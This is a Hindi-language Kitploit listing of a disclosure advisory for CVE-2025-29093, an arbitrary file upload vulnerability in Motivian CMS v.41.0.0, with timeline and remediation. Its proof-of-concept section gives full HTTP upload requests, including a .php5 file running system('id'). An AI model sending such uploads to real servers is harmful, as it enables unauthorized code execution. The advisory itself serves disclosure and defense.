Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-29093-Arbitrary-File-Upload — यह रिपॉजिटरी Motivian Content Management System v.41.0.0 में खोजी गई एक सुरक्षा कमजोरी को उजागर करती है। | Kitploit
उपकरण/GitHubGitHub/framarcuccio/cve-2025-29093-arbitrary-file-upload
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubframarcuccio/cve-2025-29093-arbitrary-file-upload

CVE-2025-29093-Arbitrary-File-Upload

यह रिपॉजिटरी Motivian Content Management System v.41.0.0 में खोजी गई एक सुरक्षा कमजोरी को उजागर करती है।

रिपॉजिटरी देखें
37 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-29093-मनमानी-फ़ाइल-अपलोड

यह रिपॉजिटरी Motivian Content Management System v.41.0.0 में खोजी गई एक सुरक्षा भेद्यता को प्रकट करती है।

  • CVE-2025-29093: मनमानी फ़ाइल अपलोड

यह भेद्यता जिम्मेदार प्रकटीकरण प्रथाओं के अनुसार विक्रेता को और MITRE को सूचित की गई थी, जिसने एक अस्थायी CVE ID निर्दिष्ट किया। 45-दिवसीय प्रकटीकरण अवधि समाप्त होने के बाद विवरण सार्वजनिक किए जा रहे हैं।

सामान्य जानकारी

  • शीर्षक: Motivian मनमानी फ़ाइल अपलोड
  • भेद्यता प्रकार: मनमानी फ़ाइल अपलोड
  • उत्पाद विक्रेता: Motivian
  • उत्पाद: Motivian Content Management System
  • प्रभावित संस्करण: Motivian CMS v.41.0.0
  • प्रभावित घटक: Content/Gallery/Images
  • हमला वेक्टर: दूरस्थ
  • प्रभाव: दुर्भावनापूर्ण मनमानी फ़ाइल अपलोड
  • गंभीरता: मध्यम
  • CVSSv3 स्कोर: 6.5
  • CVSSv3 वेक्टर: CVSS:3.1:AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
  • CISA-ADP द्वारा गंभीरता: उच्च
  • CISA-ADP द्वारा CVSSv3 स्कोर: 8.2
  • CISA-ADP द्वारा CVSSv3 वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
  • खोजा गया: 2025-02-03
  • द्वारा: Francesco Marcuccio
  • स्थिति: 7 अप्रैल 2025 को विक्रेता को सूचित किया गया - 22 मई 2025 तक कोई प्रतिक्रिया/सुधार प्राप्त नहीं हुआ

विवरण

Motivian Content Managment System v.41.0.0 में फ़ाइल अपलोड भेद्यता एक दूरस्थ हमलावर को Content/Gallery/Images घटक के माध्यम से दुर्भावनापूर्ण कोड वाली गढ़ी हुई एक्सटेंशन (जैसे .php, .png, .txt) वाली मनमानी फ़ाइलें अपलोड करने की अनुमति देती है।

प्रमाण अवधारणा

भेद्यता का शोषण विभिन्न एक्सटेंशन वाली फ़ाइलें अपलोड करके किया जा सकता है। प्रदर्शन उद्देश्यों के लिए, दो प्रमाण-अवधारणा मामलों का उपयोग किया गया: एक में दुर्भावनापूर्ण कोड वाली .php फ़ाइल, और दूसरे में EICAR परीक्षण स्ट्रिंग वाली .txt फ़ाइल। दोनों फ़ाइलें Content/Gallery/Images घटक के माध्यम से अपलोड की गईं।

नीचे मुद्दे को प्रदर्शित करने के लिए उपयोग किए गए HTTP अनुरोधों और प्रतिक्रियाओं का पूर्ण लिप्यंतरण है:

Burp अनुरोध EICAR

POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 808
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2oYL3KVZBlAQmYAA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="resFolderId"

-8
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="allowedExtensions"


------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="hidePageComponents"

false
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="struts.token.name"

token
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="token"

M53N7SE0QE1Z4MZV4BRV59QW3TSEZ962
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="uploadResource"; filename="eicar.txt"
Content-Type: text/plain

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
------WebKitFormBoundary2oYL3KVZBlAQmYAA--

Burp अनुरोध PHP

POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 789
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLdWSMj4ASbAC9uOz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="resFolderId"

304802
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="allowedExtensions"


------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="hidePageComponents"

false
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="struts.token.name"

token
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="token"

77PMJUJH5ZAQTPWRG5TQCLIOR9CUBK0M
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="uploadResource"; filename="test.php5"
Content-Type: application/octet-stream

<?php 
echo system('id'); 
?>
------WebKitFormBoundaryLdWSMj4ASbAC9uOz--

Burp प्रतिक्रिया

HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Feb 2025 10:26:29 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 16729

उपचार

उपयोगकर्ताओं को मनमानी फ़ाइलें अपलोड करने की अनुमति न दें। सख्त फ़ाइल सत्यापन (MIME प्रकार और सामग्री निरीक्षण) लागू करें, फ़ाइल नामों को यादृच्छिक बनाएं, और अपलोड निर्देशिकाओं को प्रतिबंधित करें।

प्रकटीकरण समयरेखा

दिनांककार्रवाई
2025-02-06CVE ID अनुरोध (CNA: MITRE)
2025-04-02CVE ID निर्धारण
2025-04-07विक्रेता को भेद्यताएं सूचित
2025-05-3145-दिन प्रकटीकरण अवधि (कुल 54 दिन) समाप्त होने के बाद सार्वजनिक प्रकटीकरण
2025-06-04MITRE डेटाबेस और NIST/NVD पोर्टल में आधिकारिक पंजीकरण और प्रविष्टि

श्रेय

  • द्वारा खोजा गया और जिम्मेदारी से प्रकट किया गया:
    Francesco Marcuccio
    साइबर सुरक्षा सलाहकार, प्रवेश परीक्षक

  • MITRE खोजकर्ता श्रेय इस प्रकार सूचीबद्ध:
    Francesco Marcuccio
    साइबर सुरक्षा सलाहकार, प्रवेश परीक्षक

लिंक

संदर्भ लिंक: MITRE NIST

स्थिति

यह CVE ID आधिकारिक रूप से PUBLISHED स्थिति में है। विश्लेषण के बाद NIST द्वारा इसे CVSS स्कोर के साथ अपडेट किया जाएगा।

टूल डाउनलोड करें